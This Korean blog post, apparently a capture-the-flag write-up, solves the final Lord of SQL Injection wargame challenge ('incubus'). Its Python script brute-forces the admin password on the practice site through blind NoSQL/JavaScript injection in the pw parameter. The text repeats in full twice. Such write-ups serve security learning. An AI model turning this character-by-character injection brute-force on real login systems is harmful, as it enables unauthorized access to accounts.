Lord Of SQL Injection 의 마지막 문제이다.
mongo db 환경에서의 간단한 Blind SQL Injection 문제인 것 같다. 바로 exploit 코드를 작성할 수 있을 것 같다.
import requests
requests.packages.urllib3.disable_warnings()
org_url = "https://los.rubiya.kr/chall/incubus_3dff9ce783c9f574edf015a7b99450d7.php"
header = {'Cookie': 'PHPSESSID='}
session = requests.session()
# Brute Force
password = ''
for i in range(0, 20):
for j in range(48, 122):
payload = "?pw='||obj.id=='admin'%26%26obj.pw[" + str(i) + "]==" + "'" + chr(j)
res = session.get(url = org_url + payload, headers=header, verify=False)
if ("Hello admin" in res.text) and (j != 63):
password += chr(j)
print("Current PW is [ %s ]\n" % password)
break
# Result
print("\n\nPW --> %s\n" % password)
'Web Hacking > LOS' 카테고리의 다른 글
| Lord of SQL Injection - nessie (0) | 2021.10.05 |
|---|---|
| Lord of SQL Injection - kraken (0) | 2021.10.05 |
| Lord of SQL Injection - cerberus (0) | 2021.10.05 |
| Lord of SQL Injection - yeti (0) | 2021.10.05 |
| Lord of SQL Injection - mummy (0) | 2021.10.05 |
Lord Of SQL Injection 의 마지막 문제이다.
mongo db 환경에서의 간단한 Blind SQL Injection 문제인 것 같다. 바로 exploit 코드를 작성할 수 있을 것 같다.
import requests
requests.packages.urllib3.disable_warnings()
org_url = "https://los.rubiya.kr/chall/incubus_3dff9ce783c9f574edf015a7b99450d7.php"
header = {'Cookie': 'PHPSESSID='}
session = requests.session()
# Brute Force
password = ''
for i in range(0, 20):
for j in range(48, 122):
payload = "?pw='||obj.id=='admin'%26%26obj.pw[" + str(i) + "]==" + "'" + chr(j)
res = session.get(url = org_url + payload, headers=header, verify=False)
if ("Hello admin" in res.text) and (j != 63):
password += chr(j)
print("Current PW is [ %s ]\n" % password)
break
# Result
print("\n\nPW --> %s\n" % password)'Web Hacking > LOS' 카테고리의 다른 글
| Lord of SQL Injection - nessie (0) | 2021.10.05 |
|---|---|
| Lord of SQL Injection - kraken (0) | 2021.10.05 |
| Lord of SQL Injection - cerberus (0) | 2021.10.05 |
| Lord of SQL Injection - yeti (0) | 2021.10.05 |
| Lord of SQL Injection - mummy (0) | 2021.10.05 |
